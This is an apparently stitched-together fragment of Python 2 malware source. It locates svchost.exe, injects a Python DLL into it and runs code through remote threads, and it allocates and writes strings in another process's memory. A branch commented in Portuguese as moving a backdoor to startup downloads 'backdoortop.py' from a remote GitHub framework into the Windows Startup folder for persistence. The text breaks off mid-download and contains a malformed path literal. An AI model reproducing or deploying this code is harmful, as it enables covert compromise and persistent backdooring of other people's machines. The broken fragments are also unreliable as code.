def alloc_string(pid, addr, value): x = int(addr, 16) process = Process(pid) lpNewAddr = process.malloc(len(value) + 1) newval = value + '\x0a' print HexDump.hexadecimal(newval, '\\x') try: process.write(lpNewAddr, newval) except Exception, e: process.free(lpNewAddr) raise
s.scan_processes() pl = s.find_processes_by_filename("svchost.exe") pid = pl[0][0].get_pid() p = Process(pid) print('pid', pid) print('arch', p.get_bits()) t = p.inject_dll(python_dll) p.scan_modules() m = p.get_module_by_name(python_lib) init = m.resolve("Py_InitializeEx") pyrun = m.resolve("PyRun_SimpleString") print(init, pyrun) p.start_thread(init, 0) time.sleep(0.1) sh = 'import subprocess; subprocess.call("svchost.exe")' addr = p.malloc(len(sh)) p.write(addr, sh) p.start_thread(pyrun, addr) # Movendo o backdoor pro startup if dados.startswith("move_startup"): url = "https://raw.githubusercontent.com/DedSec-F0x/DedSec-Framework/master/exploit/python/backdoortop.py" user = getpass.getuser() os.chdir("C:\Users\" + user + "AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\") u = urllib2.urlopen(url) f = open(file_name, 'wb') meta = u.info() file_size = int(meta.getheaders("Content-Length")[0]) print "Downloading: %s Bytes: %s" % (file_name, file_size) file_size_dl = 0 block_sz = 8192